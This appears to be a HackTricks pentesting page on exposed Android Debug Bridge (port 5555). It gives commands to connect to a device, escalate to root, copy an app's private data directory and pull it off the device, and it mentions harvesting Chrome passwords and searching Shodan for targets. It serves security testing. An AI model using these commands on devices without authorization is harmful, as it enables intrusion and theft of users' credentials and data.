3.9 KiB

Raw Blame History

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.

5555 - Android Debug Bridge

Basic Information

Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device. (from here)

Default port: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

If find the ADB service running in a port of a device and you can connect to it, you can get a shell inside the system:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

For more ADB commands check the following page:

{% content-ref url="../mobile-apps-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Dump App data

In order to completely download the data of an application you can:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

You can use this trick to retrieve sensitive information like chrome passwords. For more info about this check the information a references provided here.

Shodan

android debug bridge